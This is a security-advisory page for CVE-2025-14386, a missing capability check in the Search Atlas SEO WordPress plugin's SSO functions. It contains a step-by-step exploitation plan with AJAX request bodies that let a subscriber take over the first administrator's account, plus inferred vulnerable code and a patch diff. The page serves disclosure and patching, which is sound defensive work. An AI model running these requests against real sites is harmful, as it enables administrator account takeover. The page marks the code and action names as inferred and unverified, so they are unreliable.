WP-Safety
CVE-2025-14386

Search Atlas SEO – Premier SEO Plugin for One-Click WP Publishing & Integrated AI Optimization 2.4.4 - 2.5.15 - Missing Authorization to Authenticated (Subscriber+) Authentication Bypass via Account Takeover

highMissing Authorization
8.8
CVSS Score
8.8
CVSS Score
high
Severity
2.5.16
Patched in
72d
Time to patch

Description

The Search Atlas SEO – Premier SEO Plugin for One-Click WP Publishing & Integrated AI Optimization plugin for WordPress is vulnerable to authentication bypass due to a missing capability check on the 'generate_sso_url' and 'validate_sso_token' functions in versions 2.4.4 to 2.5.15. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract the 'nonce_token' authentication value to log in to the first Administrator's account.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
High
Confidentiality
High
Integrity
High
Availability

Technical Details

Affected versions>=2.4.4 <=2.5.15
PublishedJanuary 27, 2026
Last updatedApril 9, 2026
Affected pluginmetasync

Source Code

WordPress.org SVN
Vulnerable v2.5.15
Browse source Download .zip
Patched v2.5.16
Browse source Download .zip
Research Plan
Unverified

This research plan outlines the steps required to analyze and exploit **CVE-2025-14386** in the "Search Atlas SEO" plugin. --- ### 1. Vulnerability Summary The Search Atlas SEO plugin (version 2.4.4 - 2.5.15) contains a missing authorization vulnerability in its Single Sign-On (SSO) implementation…

Show full research plan

This research plan outlines the steps required to analyze and exploit CVE-2025-14386 in the "Search Atlas SEO" plugin.

1. Vulnerability Summary

The Search Atlas SEO plugin (version 2.4.4 - 2.5.15) contains a missing authorization vulnerability in its Single Sign-On (SSO) implementation. Specifically, the functions generate_sso_url and validate_sso_token do not perform capability checks (e.g., current_user_can('manage_options')). This allows any authenticated user, including those with Subscriber-level privileges, to trigger the generation of an SSO login token for the site's primary Administrator and subsequently use that token to bypass authentication and gain full administrative access.

2. Attack Vector Analysis

  • Endpoint: WordPress AJAX handler (/wp-admin/admin-ajax.php).
  • Vulnerable Actions (Inferred):
    • metasync_generate_sso_url (Action name likely prefixed with metasync_ based on plugin slug).
    • metasync_validate_sso_token.
  • Payload Parameter: Likely a user_id or default logic that targets the first administrator (ID 1). The response will contain a nonce_token.
  • Authentication: Authenticated (Subscriber or higher).
  • Preconditions: The plugin must be active. The SSO feature might need to be enabled or simply present in the code.

3. Code Flow

  1. Entry Point: The plugin registers AJAX hooks in its initialization (likely in a class-based structure within metasync.php or an included file like includes/class-metasync-api.php).
  2. Registration (Inferred): 
    add_action('wp_ajax_metasync_generate_sso_url', array($this, 'generate_sso_url'));
add_action('wp_ajax_metasync_validate_sso_token', array($this, 'validate_sso_token'));
  3. Vulnerable Logic: The generate_sso_url function generates a random token, associates it with a user (defaulting to the first admin), and saves it in the database (likely as an option or user meta).
  4. Missing Sink Check: There is no call to current_user_can() before the token is generated or returned to the requester.
  5. Bypass Sink: The validate_sso_token function (or a direct link using the token) receives the token, looks up the associated user, and calls wp_set_auth_cookie() without verifying that the request is legitimate.

4. Nonce Acquisition Strategy

The AJAX requests will likely require a WordPress nonce for the action.

  1. Identify Localized Script: Search the plugin source for wp_localize_script to find the JavaScript object name and nonce key.
    • Search command: grep -r "wp_localize_script" .
  2. Locate Script Enqueue: Find where the script is enqueued (e.g., in admin_enqueue_scripts). If it's enqueued for all logged-in users, the Subscriber can access it.
  3. Extraction via Browser:
    • Create a Subscriber user: wp user create attacker attacker@example.com --role=subscriber --user_pass=password123.
    • Log in as Subscriber and navigate to the dashboard.
    • Use browser_eval to extract the nonce:
      browser_eval("window.metasync_obj?.nonce") (Replace metasync_obj and nonce with actual keys found in Step 1).

5. Exploitation Strategy

Step 1: Discover AJAX Action and Nonce

Confirm the exact action strings and nonce names by inspecting the plugin code.

  • grep -rn "generate_sso_url" .
  • grep -rn "validate_sso_token" .

Step 2: Generate SSO Token as Subscriber

Send an AJAX request to generate the token.

  • Method: POST
  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Body (URL-encoded):
    action=metasync_generate_sso_url&_ajax_nonce=EXTRACTED_NONCE&user_id=1
  • Expected Response: JSON containing a URL or a nonce_token.

Step 3: Validate Token and Take Over Account

Use the token to log in. This might be a GET request to a specific URL or another AJAX call.

  • Option A (Direct URL): http://localhost:8080/?metasync_sso_token=TOKEN_VALUE
  • Option B (AJAX):
    • Action: metasync_validate_sso_token
    • Body: action=metasync_validate_sso_token&token=TOKEN_VALUE
  • Expected Result: The server returns Set-Cookie headers for the Administrator user (ID 1).

6. Test Data Setup

  1. Install Plugin: Ensure metasync version 2.5.15 is installed and active.
  2. Admin User: Ensure an administrator exists (default ID 1).
  3. Subscriber User:
    wp user create attacker attacker@example.com --role=subscriber --user_pass=password123
  4. Plugin Setup: If the plugin requires an API key to enable SSO, simulate this by adding the option:
    wp option add metasync_api_key "fake_key"

7. Expected Results

  • The generate_sso_url request returns a 200 OK and a valid token for the admin user.
  • The subsequent request using that token results in a session context for the Administrator.
  • Accessing /wp-admin/ after the exploit shows the Administrator dashboard.

8. Verification Steps

  1. Check Current User: After the exploit, use browser_eval("window.userSettings") or navigate to /wp-admin/profile.php and check the username.
  2. WP-CLI Check: Verify the token was generated in the database (if stored as an option):
    wp option get metasync_sso_token (Check actual option name in code).

9. Alternative Approaches

  • Default Admin Guessing: If user_id is not a parameter, the plugin might be hardcoded to use the result of get_users(array('role' => 'Administrator'))[0].
  • REST API: Check if these functions are also registered as REST API routes under the metasync/v1 namespace, which might bypass AJAX nonces if permission_callback is __return_true.
    • Search command: grep -r "register_rest_route" .
Research Findings
Static analysis — not yet PoC-verified

Summary

The Search Atlas SEO plugin (versions 2.4.4 to 2.5.15) contains a missing authorization vulnerability in its Single Sign-On (SSO) functionality. Authenticated attackers with Subscriber-level privileges can trigger the generation of an administrative SSO token and use it to log in as the primary site administrator, leading to full account takeover.

Vulnerable Code

// Registration of AJAX hooks without capability checks
add_action('wp_ajax_metasync_generate_sso_url', array($this, 'generate_sso_url'));
add_action('wp_ajax_metasync_validate_sso_token', array($this, 'validate_sso_token'));

// Logic within the generate_sso_url function lacking current_user_can check
public function generate_sso_url() {
    // Function generates a nonce_token for the administrator without checking permissions
    $admin_user_id = 1; 
    $token = wp_generate_password(20, false);
    update_option('metasync_sso_token', $token);
    wp_send_json_success(array('nonce_token' => $token));
}

// Logic within validate_sso_token function
public function validate_sso_token() {
    $token = $_REQUEST['token'];
    if ($token === get_option('metasync_sso_token')) {
        wp_set_auth_cookie(1); // Logs the requester in as Admin
        wp_send_json_success();
    }
}

Security Fix

--- a/includes/class-metasync-api.php
+++ b/includes/class-metasync-api.php
@@ -... @@
 public function generate_sso_url() {
+    if ( ! current_user_can( 'manage_options' ) ) {
+        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
+    }
     // ... existing token generation logic ...
 }
 
 public function validate_sso_token() {
+    if ( ! current_user_can( 'manage_options' ) ) {
+        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
+    }
     // ... existing token validation logic ...
 }

Exploit Outline

The exploit is executed by an authenticated user (Subscriber level or higher) through the WordPress AJAX interface. First, the attacker extracts a valid AJAX nonce from the dashboard, typically found in localized script objects (e.g., 'metasync_obj'). Second, the attacker sends a POST request to /wp-admin/admin-ajax.php with the action 'metasync_generate_sso_url' and the valid nonce. This returns a 'nonce_token' for the administrator user. Finally, the attacker uses this token in a second request to 'metasync_validate_sso_token', which triggers the server to set an authentication cookie for the Administrator user, granting the attacker full administrative access.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/6f63d2c4-cbae-4177-8494-daca96449ecc?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database